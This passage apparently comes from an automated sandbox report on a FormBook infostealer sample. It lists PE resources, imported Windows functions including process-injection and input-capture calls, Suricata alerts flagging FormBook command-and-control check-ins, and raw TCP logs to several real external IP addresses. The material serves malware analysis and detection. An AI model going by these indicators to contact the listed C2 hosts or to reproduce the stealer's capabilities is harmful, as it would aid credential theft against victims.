                                                                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                              Imports

                                                                                              DLLImport
                                                                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishGreat Britain
                                                                                              EnglishUnited States

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-10-08T15:52:31.520083+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65003285.159.66.9380TCP
                                                                                              2024-10-08T15:52:31.520083+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65003285.159.66.9380TCP
                                                                                              2024-10-08T15:53:20.979467+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649932148.72.152.17480TCP
                                                                                              2024-10-08T15:53:20.979467+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649932148.72.152.17480TCP
                                                                                              2024-10-08T15:53:36.628566+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499853.33.130.19080TCP
                                                                                              2024-10-08T15:53:40.009901+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499863.33.130.19080TCP
                                                                                              2024-10-08T15:53:41.676273+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499873.33.130.19080TCP
                                                                                              2024-10-08T15:53:45.164677+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6499883.33.130.19080TCP
                                                                                              2024-10-08T15:53:45.164677+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499883.33.130.19080TCP
                                                                                              2024-10-08T15:53:51.144200+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990172.191.244.6280TCP
                                                                                              2024-10-08T15:53:53.660198+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649992172.191.244.6280TCP
                                                                                              2024-10-08T15:53:56.364368+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649993172.191.244.6280TCP
                                                                                              2024-10-08T15:53:58.879263+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649994172.191.244.6280TCP
                                                                                              2024-10-08T15:53:58.879263+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649994172.191.244.6280TCP
                                                                                              2024-10-08T15:54:05.215147+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649995172.96.191.3980TCP
                                                                                              2024-10-08T15:54:07.888162+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649996172.96.191.3980TCP
                                                                                              2024-10-08T15:54:10.367641+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997172.96.191.3980TCP
                                                                                              2024-10-08T15:54:12.891516+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649998172.96.191.3980TCP
                                                                                              2024-10-08T15:54:12.891516+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649998172.96.191.3980TCP
                                                                                              2024-10-08T15:54:18.612381+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649999217.70.184.5080TCP
                                                                                              2024-10-08T15:54:21.136113+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001217.70.184.5080TCP
                                                                                              2024-10-08T15:54:23.693625+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002217.70.184.5080TCP
                                                                                              2024-10-08T15:54:26.225019+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650003217.70.184.5080TCP
                                                                                              2024-10-08T15:54:26.225019+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650003217.70.184.5080TCP
                                                                                              2024-10-08T15:54:32.059634+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000463.250.47.4080TCP
                                                                                              2024-10-08T15:54:34.593707+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000563.250.47.4080TCP
                                                                                              2024-10-08T15:54:37.140940+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000663.250.47.4080TCP
                                                                                              2024-10-08T15:54:39.788673+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65000763.250.47.4080TCP
                                                                                              2024-10-08T15:54:39.788673+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000763.250.47.4080TCP
                                                                                              2024-10-08T15:54:45.464154+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000891.184.0.20080TCP
                                                                                              2024-10-08T15:54:47.997439+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000991.184.0.20080TCP
                                                                                              2024-10-08T15:54:50.681531+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001091.184.0.20080TCP
                                                                                              2024-10-08T15:54:53.318568+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65001191.184.0.20080TCP
                                                                                              2024-10-08T15:54:53.318568+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001191.184.0.20080TCP
                                                                                              2024-10-08T15:54:58.830090+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001213.248.169.4880TCP
                                                                                              2024-10-08T15:55:01.380573+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001313.248.169.4880TCP
                                                                                              2024-10-08T15:55:04.112030+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001413.248.169.4880TCP
                                                                                              2024-10-08T15:55:06.485146+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65001513.248.169.4880TCP
                                                                                              2024-10-08T15:55:06.485146+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001513.248.169.4880TCP
                                                                                              2024-10-08T15:55:26.847034+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002143.242.202.16980TCP
                                                                                              2024-10-08T15:55:29.531562+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002243.242.202.16980TCP
                                                                                              2024-10-08T15:55:32.142489+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002343.242.202.16980TCP
                                                                                              2024-10-08T15:55:34.514487+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65002443.242.202.16980TCP
                                                                                              2024-10-08T15:55:34.514487+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65002443.242.202.16980TCP
                                                                                              2024-10-08T15:55:40.590660+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025103.224.182.24280TCP
                                                                                              2024-10-08T15:55:44.298531+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650026103.224.182.24280TCP
                                                                                              2024-10-08T15:55:46.851792+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650027103.224.182.24280TCP
                                                                                              2024-10-08T15:55:49.396086+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650028103.224.182.24280TCP
                                                                                              2024-10-08T15:55:49.396086+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650028103.224.182.24280TCP
                                                                                              2024-10-08T15:55:56.301612+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65002985.159.66.9380TCP
                                                                                              2024-10-08T15:55:59.785995+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003085.159.66.9380TCP
                                                                                              2024-10-08T15:56:02.332989+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65003185.159.66.9380TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 8, 2024 15:53:20.443182945 CEST4993280192.168.2.6148.72.152.174
                                                                                              Oct 8, 2024 15:53:20.448822021 CEST8049932148.72.152.174192.168.2.6
                                                                                              Oct 8, 2024 15:53:20.448901892 CEST4993280192.168.2.6148.72.152.174
                                                                                              Oct 8, 2024 15:53:20.457938910 CEST4993280192.168.2.6148.72.152.174
                                                                                              Oct 8, 2024 15:53:20.463149071 CEST8049932148.72.152.174192.168.2.6
                                                                                              Oct 8, 2024 15:53:20.977030039 CEST8049932148.72.152.174192.168.2.6
                                                                                              Oct 8, 2024 15:53:20.977452040 CEST8049932148.72.152.174192.168.2.6
                                                                                              Oct 8, 2024 15:53:20.979466915 CEST4993280192.168.2.6148.72.152.174
                                                                                              Oct 8, 2024 15:53:21.014549971 CEST4993280192.168.2.6148.72.152.174
                                                                                              Oct 8, 2024 15:53:21.019619942 CEST8049932148.72.152.174192.168.2.6
                                                                                              Oct 8, 2024 15:53:36.077152967 CEST4998580192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:36.082971096 CEST80499853.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:36.083039045 CEST4998580192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:36.095050097 CEST4998580192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:36.100734949 CEST80499853.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:36.626209974 CEST80499853.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:36.628566027 CEST4998580192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:37.598754883 CEST4998580192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:37.603588104 CEST80499853.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:38.617480993 CEST4998680192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:38.623136044 CEST80499863.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:38.623215914 CEST4998680192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:38.635107994 CEST4998680192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:38.640121937 CEST80499863.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:40.009849072 CEST80499863.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:40.009901047 CEST4998680192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:40.145210981 CEST4998680192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:40.150126934 CEST80499863.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:41.199176073 CEST4998780192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:41.205060005 CEST80499873.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:41.208666086 CEST4998780192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:41.231118917 CEST4998780192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:41.238075972 CEST80499873.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:41.238240004 CEST80499873.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:41.676218033 CEST80499873.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:41.676273108 CEST4998780192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:42.738974094 CEST4998780192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:42.744651079 CEST80499873.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:43.785136938 CEST4998880192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:43.789989948 CEST80499883.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:43.790067911 CEST4998880192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:43.798047066 CEST4998880192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:43.802798033 CEST80499883.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:45.163804054 CEST80499883.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:45.164170027 CEST80499883.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:45.164676905 CEST4998880192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:45.166940928 CEST4998880192.168.2.63.33.130.190
                                                                                              Oct 8, 2024 15:53:45.172389984 CEST80499883.33.130.190192.168.2.6
                                                                                              Oct 8, 2024 15:53:50.643187046 CEST4999080192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:50.648140907 CEST8049990172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:50.648238897 CEST4999080192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:50.659717083 CEST4999080192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:50.665333033 CEST8049990172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:51.143800974 CEST8049990172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:51.144099951 CEST8049990172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:51.144200087 CEST4999080192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:52.162730932 CEST4999080192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:53.180164099 CEST4999280192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:53.185637951 CEST8049992172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:53.185739994 CEST4999280192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:53.198024035 CEST4999280192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:53.202905893 CEST8049992172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:53.660002947 CEST8049992172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:53.660141945 CEST8049992172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:53.660197973 CEST4999280192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:54.708791971 CEST4999280192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:55.727838993 CEST4999380192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:55.732944012 CEST8049993172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:55.733027935 CEST4999380192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:55.749417067 CEST4999380192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:55.756062984 CEST8049993172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:55.756588936 CEST8049993172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:56.364268064 CEST8049993172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:56.364288092 CEST8049993172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:56.364309072 CEST8049993172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:56.364367962 CEST4999380192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:56.364367962 CEST4999380192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:57.254625082 CEST4999380192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:58.410289049 CEST4999480192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:58.415307999 CEST8049994172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:58.415404081 CEST4999480192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:58.429929018 CEST4999480192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:58.434819937 CEST8049994172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:58.877970934 CEST8049994172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:58.878947973 CEST8049994172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:53:58.879262924 CEST4999480192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:58.881472111 CEST4999480192.168.2.6172.191.244.62
                                                                                              Oct 8, 2024 15:53:58.886368990 CEST8049994172.191.244.62192.168.2.6
                                                                                              Oct 8, 2024 15:54:04.288582087 CEST4999580192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:04.293607950 CEST8049995172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:04.293699026 CEST4999580192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:04.354361057 CEST4999580192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:04.359982967 CEST8049995172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:05.214426994 CEST8049995172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:05.214680910 CEST8049995172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:05.215147018 CEST4999580192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:05.863944054 CEST4999580192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:06.882973909 CEST4999680192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:06.887748003 CEST8049996172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:06.887833118 CEST4999680192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:06.899178028 CEST4999680192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:06.904442072 CEST8049996172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:07.888030052 CEST8049996172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:07.888101101 CEST8049996172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:07.888153076 CEST8049996172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:07.888161898 CEST4999680192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:07.888194084 CEST4999680192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:08.410830021 CEST4999680192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:09.430522919 CEST4999780192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:09.435545921 CEST8049997172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:09.435626984 CEST4999780192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:09.448296070 CEST4999780192.168.2.6172.96.191.39
                                                                                              Oct 8, 2024 15:54:09.453305960 CEST8049997172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:09.453495979 CEST8049997172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:10.367219925 CEST8049997172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:10.367578983 CEST8049997172.96.191.39192.168.2.6
                                                                                              Oct 8, 2024 15:54:10.367640972 CEST4999780192.168.2.6172.96.191.39
